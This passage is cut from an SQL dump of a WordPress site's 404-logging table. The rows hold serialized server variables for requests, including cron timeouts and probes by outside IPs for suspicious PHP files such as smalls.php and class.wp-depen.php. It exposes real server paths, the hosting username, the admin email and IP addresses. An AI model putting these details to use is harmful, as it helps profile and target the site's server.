gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570187156.9113490581512451171875\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:180:\"/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1570187156.9113490581512451171875\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"39882\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570187156.9113490581512451171875\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZcnlOwhi3OTWv4PG6hacAAAABg\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZcnlOwhi3OTWv4PG6hacAAAABg\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"39882\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZcnlOwhi3OTWv4PG6hacAAAABg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570188067.0576\";s:12:\"REQUEST_TIME\";s:10:\"1570188067\";}}','notice','2019-10-04 11:21:22','2019-10-04 11:21:07',35063352,35315608,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1570187156.9113490581512451171875',1,0,'103.6.198.69'),(27484,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"EF36BD3B-C22A-41AE-A282-8F422A99DAC5\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZcbHuwhi3OTWv4PG6hTTAAAAAw\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:10:\"1.32.27.67\";s:11:\"REMOTE_PORT\";s:5:\"51570\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZcbHuwhi3OTWv4PG6hTTAAAAAw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570183967.189\";s:12:\"REQUEST_TIME\";s:10:\"1570183967\";}}','notice','2019-10-04 10:12:52','2019-10-04 10:12:48',35778456,37577960,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'1.32.27.67'),(27483,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:45:\"/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/B08C390C\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:43:\"page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"158.69.138.17\";s:11:\"REMOTE_PORT\";s:5:\"61683\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZcXKQRUccy7Wh4UNKeSDwAAAEU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570182954.1486\";s:12:\"REQUEST_TIME\";s:10:\"1570182954\";}}','notice','2019-10-04 09:55:58','2019-10-04 09:55:54',35417800,37226968,'https://bintara.com.my/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2',1,0,'158.69.138.17'),(27445,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/?page_id=18%2Fcontact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0.1 Safari/604.3.5\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:24:\"page_id=18%2Fcontact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"35.239.195.27\";s:11:\"REMOTE_PORT\";s:5:\"64710\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZTebxgmXC16hB5CLDmeegAAABI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570037359.9578\";s:12:\"REQUEST_TIME\";s:10:\"1570037359\";}}','notice','2019-10-02 17:29:23','2019-10-02 17:29:20',35538616,37338264,'https://bintara.com.my/?page_id=18%2Fcontact.php',1,0,'35.239.195.27'),(27444,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:55:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/smalls.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/smalls.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:11:\"/smalls.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZTZ5MWBowiMh4n@4AYh0AAAAJc\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/smalls.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/smalls.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZTZ5MWBowiMh4n@4AYh0AAAAJc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:12:\"77.124.38.55\";s:11:\"REMOTE_PORT\";s:5:\"53575\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/smalls.php\";s:10:\"SCRIPT_URL\";s:11:\"/smalls.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZTZ5MWBowiMh4n@4AYh0AAAAJc\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570036196.3066\";s:12:\"REQUEST_TIME\";s:10:\"1570036196\";}}','notice','2019-10-02 17:09:58','2019-10-02 17:09:56',35197040,37008352,'https://bintara.com.my/smalls.php',1,0,'77.124.38.55'),(27443,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:55:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:31:\"/wp-includes/class.wp-depen.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:53:\"https://bintara.com.my/wp-includes/class.wp-depen.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:31:\"/wp-includes/class.wp-depen.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZTHzmTGvQ0Bk@freowIQQAAAMc\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:53:\"https://bintara.com.my/wp-includes/class.wp-depen.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:31:\"/wp-includes/class.wp-depen.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZTHzmTGvQ0Bk@freowIQQAAAMc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"36.75.156.240\";s:11:\"REMOTE_PORT\";s:5:\"59677\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:53:\"https://bintara.com.my/wp-includes/class.wp-depen.php\";s:10:\"SCRIPT_URL\";s:31:\"/wp-includes/class.wp-depen.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZTHzmTGvQ0Bk@freowIQQAAAMc\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1570031566.43\";s:12:\"REQUEST_TIME\";s:10:\"1570031566\";}}','notice','2019-10-02 15:52:50','2019-10-02 15:52:46',35591944,37391736,'https://bintara.com.my/wp-includes/class.wp-depen.php',1,0,'36.75.156.240'),(27402,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:84:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569927798.6199529170989990234375\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569927798.6199529170989990234375\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569927798.6199529170989990234375\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:180:\"/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1569927798.6199529170989990234375\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"38868\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569927798.6199529170989990234375\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZMydg1@FMe1KrdqPAPQwgAAAAQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\"